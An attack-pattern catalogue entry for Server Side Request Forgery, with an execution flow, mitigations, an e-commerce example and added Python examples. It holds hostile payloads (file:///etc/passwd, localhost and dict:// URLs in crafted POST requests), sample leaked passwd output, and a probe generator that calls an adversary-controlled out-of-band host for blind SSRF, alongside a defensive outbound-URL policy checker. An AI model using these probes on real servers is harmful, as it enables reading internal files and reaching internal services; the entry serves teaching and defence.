CAPEC List (Version 3.5)

CAPEC-664: Server Side Request Forgery

Attack Pattern ID: 664
Abstraction: Standard
Status: Stable
+ Description

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server's internal network, or to external third parties. If successful, the request is made by the server, so any trust that other services place in the server's network position or identity (loopback-only listeners, IP allowlists, firewall rules, internal DNS names) is bypassed. This ultimately allows the adversary to read sensitive data, interact with services on the server's network, and make external requests that appear to originate from the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.

+ Likelihood Of Attack

High

+ Typical Severity

High

+ Relationships
This table shows the other attack patterns and high level categories that are related to this attack pattern. These relationships are defined as ChildOf and ParentOf, and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and CanAlsoBe are defined to show similar attack patterns that the user may want to explore.

Nature       Type                      ID    Name
ChildOf      Meta Attack Pattern       115   Authentication Bypass
CanFollow    Meta Attack Pattern       122   Privilege Abuse
CanFollow    Standard Attack Pattern   126   Path Traversal
CanFollow    Meta Attack Pattern       161   Infrastructure Manipulation
CanFollow    Standard Attack Pattern   253   Remote Code Inclusion
CanFollow    Standard Attack Pattern   309   Network Topology Mapping

A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of a related group of standard level attack patterns and is particularly useful for architecture and design level threat modeling exercises. A standard level attack pattern is focused on a specific methodology or technique used in an attack; it is often seen as a singular piece of a fully executed attack and provides sufficient detail to understand the technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.
+ Execution Flow
Explore
  1. Find target application: Find a target web application that accepts a URL, hostname, or other resource location as user input and fetches the referenced resource from the server side

Experiment
  1. Examine the HTTP request (GET or POST) to view the format of the URL-carrying parameter
    Techniques
    Manipulate the URL parameter (change the scheme, host, port, or path) and look for an error response or status code that reveals whether, and how, the server validates the supplied URL.
    Use a list of SSRF probe URLs as parameter values for known endpoints. Where possible, point each probe at an adversary-controlled host and embed a unique identifier in it, so that an out-of-band DNS lookup or HTTP request can be attributed to the exact parameter that triggered it even when the response body is never returned to the client (blind SSRF).
    Create a request with a local resource such as file:///etc/passwd or http://localhost/ as the parameter and examine the output for its contents or for differences in status, size, or timing.
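The probing steps above can be scripted. The following is an added example written for this page, not CAPEC's or any referenced project's code: it builds one out-of-band probe per injectable parameter (a hostname under an adversary-controlled zone carrying a unique token), adds the in-band payloads used in the example instance on this page, and then attributes DNS lookups seen in the zone's query log back to the parameter that caused them. The parameter names, the zone `oob.example`, the DNS log format and the log lines are constructed for the demonstration.

```python
"""Added example (not CAPEC's or the referenced projects' code): generating
SSRF probe payloads that carry unique identifiers and correlating the
out-of-band DNS callbacks they trigger back to the parameter that caused them.
The parameter names, OOB_DOMAIN and the DNS log lines are constructed."""
import re
import secrets
from urllib.parse import urlencode

# Assumed adversary-controlled zone whose authoritative name server logs every
# query it receives.  A lookup of <param>-<token>.oob.example proves that the
# target resolved (and very likely fetched) the URL injected into <param>.
OOB_DOMAIN = "oob.example"

# In-band payloads taken from the example instance on this page; they only
# help when the application echoes the fetched response to the client.
INBAND_PAYLOADS = [
    "http://localhost/server-status",
    "file:///etc/passwd",
    "dict://localhost:12345/info",
]

# Constructed log format: "<time> query: <qname> IN <type> from <source ip>".
_DNS_LINE = re.compile(
    r"query:\s+(?P<qname>\S+)\s+IN\s+\w+\s+from\s+(?P<src>[0-9a-fA-F.:]+)")
_PASSWD_ROOT = re.compile(r"^root:[^:\n]*:0:0:", re.M)


def build_probes(params):
    """Return one dict per request to send: {'param', 'token', 'url', 'body'}.

    Every injectable parameter gets one out-of-band probe whose hostname embeds
    a fresh 8-hex-digit token, plus the in-band payloads.  'body' is the
    form-encoded POST body, like the one in the example instance.
    """
    probes = []
    for name in params:
        token = secrets.token_hex(4)
        oob_url = f"http://{name}-{token}.{OOB_DOMAIN}/"
        probes.append({"param": name, "token": token, "url": oob_url,
                       "body": urlencode({name: oob_url})})
        for url in INBAND_PAYLOADS:
            probes.append({"param": name, "token": None, "url": url,
                           "body": urlencode({name: url})})
    return probes


def correlate(probes, dns_log_lines):
    """Map callbacks in the DNS log to the probes that caused them.

    Returns a list of (param, source_ip) for each token that was looked up.
    Query names are lower-cased first: DNS is case-insensitive and some
    resolvers randomise the case of query names (0x20 encoding).
    """
    by_token = {p["token"]: p for p in probes if p["token"]}
    host_re = re.compile(r"(?P<param>[\w-]+)-(?P<token>[0-9a-f]{8})\."
                         + re.escape(OOB_DOMAIN))
    hits = []
    for line in dns_log_lines:
        m = _DNS_LINE.search(line)
        if not m:
            continue
        hm = host_re.fullmatch(m.group("qname").lower().rstrip("."))
        if hm and hm.group("token") in by_token:
            hits.append((by_token[hm.group("token")]["param"], m.group("src")))
    return hits


def looks_like_passwd(body):
    """In-band check for the file:///etc/passwd payload: a leaked passwd file
    contains the root account with UID 0 and GID 0."""
    return bool(_PASSWD_ROOT.search(body))
```

The source address recorded with each callback is itself useful: it tells the adversary which egress address the server uses, which is the identity later "spoofed" requests will carry.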
Exploit
  1. Malicious request: Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services

+ Prerequisites
Server must be running a web application that processes HTTP requests and fetches a resource whose location (URL, hostname, or path) is derived, in whole or in part, from client-supplied input.
+ Skills Required
[Level: Medium]
The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response.
[Level: High]
The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.
+ Resources Required
[None] No specialized resources are required to execute this type of attack.
+ Consequences
This table specifies different individual consequences associated with the attack pattern. The Scope identifies the security property that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in their attack. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a pattern will be used to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.

Scope                                       Impact                 Likelihood
Integrity, Confidentiality, Availability    Modify Data
Confidentiality                             Read Data
Availability                                Resource Consumption
+ Mitigations
Handling incoming requests securely is the first line of action to mitigate this vulnerability. This can be done through URL validation: parse the supplied URL with the same parser the fetching code uses, then check the scheme, host, and port against a policy, rather than matching the raw string with regular expressions.
Further down the process flow, examining the response and verifying that it is as expected (content type, size, and format) before returning it to the client is another way to secure the server; it limits what an adversary can read through the server even when a request does get through.
Allowlisting the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make requests to arbitrary services; denylists of internal ranges, by contrast, are bypassed too easily (alternate IP encodings, IPv4-mapped IPv6 addresses, redirects, and DNS names that resolve to internal addresses). Resolve the allowlisted name, check the resulting addresses, and connect to one of them, so that a DNS-rebinding adversary cannot change the answer between the check and the fetch; apply the same check to every redirect the server follows.
Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server or its network. With local authentication enforced, reaching the server is no longer enough to reach every internal service.
Enforce the usage of relevant URL schemes. By allowing only http:// and https://, for example, requests through schemes such as file://, ftp://, and dict:// are prevented.
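The following is an added example written for this page, not CAPEC's own code, showing the scheme, allowlist, port and resolved-address checks above combined into one policy function that a server would call before every outbound fetch. The allowlist, the stub DNS answers, the hostname `inventory.internal.example` and the placeholder public address are constructed; `vulnerableshop.net` is the host from the example instance below. The rejection reasons are what the page's own payloads (`http://localhost/server-status`, `file:///etc/passwd`, `dict://localhost:12345/info`) would produce.

```python
"""Added example (not CAPEC's own code): an outbound-URL policy check that
applies the mitigations above (scheme enforcement, a per-host allowlist,
and a check of the resolved addresses) before the server makes a fetch.
The allowlist, the stub DNS answers and the hostnames are constructed."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 8080}
# Allowlist: hostname -> networks it is expected to resolve into.  None means
# "must be a public address"; an internal service is pinned to its subnet.
ALLOWED_HOSTS = {
    "vulnerableshop.net": None,                               # page's example host
    "inventory.internal.example": [ipaddress.ip_network("10.20.0.0/24")],
}
# Ranges the stdlib does not mark private but that must never be fetched.
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]    # shared/CGNAT space


class UnsafeURL(ValueError):
    """Raised when a URL fails the outbound policy."""


def is_public(ip):
    """True only for a globally routable unicast address.  IPv4-mapped IPv6
    (::ffff:127.0.0.1) is unwrapped first; otherwise loopback would pass."""
    if isinstance(ip, str):
        ip = ipaddress.ip_address(ip)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    if (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified):
        return False
    return not any(ip in net for net in EXTRA_BLOCKED)


def system_resolve(host):
    """Production resolver: every address the name currently maps to."""
    return {ipaddress.ip_address(ai[4][0]) for ai in socket.getaddrinfo(host, None)}


def check_outbound_url(url, resolver=system_resolve):
    """Return (host, port, addresses) for a URL the server may fetch, or raise.

    The caller must connect to one of the returned addresses instead of
    resolving again, so a DNS-rebinding adversary cannot change the answer
    between check and use, and must re-run this check on every redirect.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo in URL")      # http://allowed.host@10.0.0.1/
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        raise UnsafeURL(f"host not allowlisted: {host!r}")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        raise UnsafeURL("malformed port")
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port not allowed: {port}")
    addrs = resolver(host)
    if not addrs:
        raise UnsafeURL(f"{host} did not resolve")
    pinned = ALLOWED_HOSTS[host]
    bad = [str(ip) for ip in addrs
           if not (is_public(ip) if pinned is None else any(ip in n for n in pinned))]
    if bad:
        raise UnsafeURL(f"{host} resolved to disallowed address(es): {bad}")
    return host, port, sorted(str(ip) for ip in addrs)


# Constructed DNS answers so the demo runs offline (use system_resolve in
# production).  The public address is a placeholder, not the host's real one.
STUB_DNS = {
    "vulnerableshop.net": {ipaddress.ip_address("93.184.216.34")},
    "inventory.internal.example": {ipaddress.ip_address("10.20.0.5")},
}


def stub_resolve(host):
    return STUB_DNS.get(host, set())


def rebound_resolve(host):
    """Simulates a DNS-rebinding answer: an allowlisted public name suddenly
    resolving to loopback."""
    return {ipaddress.ip_address("127.0.0.1")}


def evaluate(urls, resolver=stub_resolve):
    """Run each URL through the policy: {url: 'allowed' or the rejection reason}."""
    results = {}
    for url in urls:
        try:
            check_outbound_url(url, resolver)
            results[url] = "allowed"
        except UnsafeURL as e:
            results[url] = str(e)
    return results
```

Pinning each allowlisted name to the address range it is expected to live in is what makes the allowlist hold up against rebinding: the external shop host is rejected the moment it resolves to loopback, while the internal inventory host is accepted only inside its own subnet.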
+ Example Instances

An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:

    POST /product/category HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 200

    vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory

A malicious user can modify the request URL to look like this instead:

    POST /product/category HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 200

    vulnerableService=http://localhost/server-status

or

    vulnerableService=file:///etc/passwd

or

    vulnerableService=dict://localhost:12345/info

If the exploit is successful, the server may return the data requested by the adversary, in this case the contents of /etc/passwd:

    root:!:0:0::/:/usr/bin/ksh
    daemon:!:1:1::/etc:
    bin:!:2:2::/bin:
    sys:!:3:3::/usr/sys:
    adm:!:4:4::/var/adm:
    uucp:!:5:5::/usr/lib/uucp:
    guest:!:100:100::/home/guest:
    nobody:!:4294967294:4294967294::/:
    lpd:!:9:4294967294::/:
    lp:*:11:11::/var/spool/lp:/bin/false
    invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
    nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
    paul:!:201:1::/home/paul:/usr/bin/ksh
    jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh

The CallStranger attack is an observed example of SSRF in a non-web protocol. It targets UPnP (Universal Plug and Play), which is used by routers, printers, media devices and gaming consoles. To execute the attack, an adversary first scans the LAN to discover UPnP-enabled devices and the services they expose. UPnP's event subscription mechanism lets a subscriber supply the callback URL to which the device should deliver event notifications; affected devices accept an arbitrary URL here, so the device makes requests to an adversary-chosen destination on the adversary's behalf. This can be used to exfiltrate data from the network, to scan hosts and ports that are only reachable from the device, and to reflect and amplify traffic toward a victim. The checker tool in the reference automates the discovery step and confirms, using a verification server under the tester's control, which of the discovered endpoints issue the callback. [REF-646]

+ References
[REF-644] "OWASP SSRF Bible". OWASP. 2017-01-26. <https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf>. URL validated: 2021-05-17.
[REF-645] "Server Side Request Forgery". PortSwigger. <https://portswigger.net/web-security/ssrf>. URL validated: 2021-05-17.
[REF-646] "CallStranger Vulnerability". Yunus Cadirici. 2020-06-08. <https://github.com/yunuscadirci/CallStranger>. URL validated: 2021-05-17.
+ Content History
Submissions
Submission DateSubmitterOrganization
2021-06-24CAPEC Content TeamThe MITRE Corporation
Page Last Updated or Reviewed: June 24, 2021